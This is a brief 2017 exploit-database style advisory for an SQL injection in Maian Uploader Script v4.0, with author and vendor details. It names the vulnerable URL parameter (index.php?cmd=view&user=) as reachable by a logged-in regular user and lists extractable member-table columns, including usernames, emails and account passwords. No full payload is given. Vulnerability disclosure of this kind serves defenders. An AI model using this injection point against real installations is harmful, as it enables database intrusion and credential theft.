# # # # # # Exploit Title: Maian Uploader Script v4.0 - SQL Injection # Google Dork: N/A # Date: 04.04.2017 # Vendor Homepage: http://www.maiansoftware.com/ # Software: http://www.maianuploader.com/?dl=yes # Demo: http://www.maiansoftware.com/demos/uploader/ # Version: 4.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # #ihsansencan # # # # # # SQL Injection/Exploit : # Login as regular user # http://localhost/[PATH]/index.php?cmd=view&user=[SQL] # mu_members:id # mu_members:joindate # mu_members:sign_date # mu_members:joinstamp # mu_members:username # mu_members:email # mu_members:accpass # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-04-05]